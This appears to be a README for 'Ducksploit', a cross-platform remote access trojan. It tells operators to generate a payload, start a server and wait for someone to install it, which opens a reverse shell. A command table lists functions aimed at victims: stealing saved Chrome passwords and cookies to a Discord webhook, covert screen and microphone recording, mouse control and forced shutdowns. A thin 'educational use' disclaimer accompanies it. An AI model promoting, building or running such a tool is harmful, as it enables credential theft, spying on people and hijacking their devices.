Awsome crossbreed of c#, batch, bash powershell, java and python on Windows, Android n linux ♥
- Download the hacker's version for your version (win/linux/android) on our website
- Install the executable (DSinstaller.exe/.deb/.apk)
- Type ds in your terminal
- And done!
- Set your port
- Click on START SERVER button
- And wait till someone install your payload
Just install the generated payload and that will start automaticaly the client of the reverse shell :warning: Ducksploit is made for legal use or educational use (then, we are not responsible for any crimes committed by our users):warning:
- type 'ds uninstall' in cmd
- Done 😄
- Delete the app from your phone
Command | Usage | Result |
wait | wait | wait your victim's connection |
Command | Usage | Result |
info | info | view all your account's infos |
Command | Usage | Result |
stealpwds | stealpwds (discord webhook url) | steal all saved chrome passwords of your victim and send them into a discord webhook |
stealcookies | stealcookies (discord webhook url) | steal all saved chrome cookies of your victim and send them into a discord webhook |
open | open (applicationname.exe) | open mensioned application |
recordscreen | recordscreen (time in second) | record victim's screen durring amount of time |
recordmicro | recordmicro (time in second) | record victim's micro durring amount of time |
Command | Usage | Result |
mouseclick | mouseclick [left, right, middle] | make the victim click the mensionned button |
mousemove | mousemove (x) (y) | move the victim's cursor by x and y pixels |
locatemouse | locatemouse | get the victim's cursor current locations |
Command | Usage | Result |
msg | msg (title) (line1) (line2) | create an alertbox and send it on the vitim's pc with a title and 2 lines |
Command | Usage | Result |
skull | skull | spam cmds with skull and crossbones |
Command | Usage | Result |
uninstall | uninstall | uninstall ducksploit |
update | update | update ducksploit |
credits | credits | view ducksploit's credits |
help | help | getting the list of all commands |
shutdown | shutdown | make the victim's pc shutdown |
reboot | reboot | make the victim's pc reboot |
closesession | closesesion | make the victim's session close |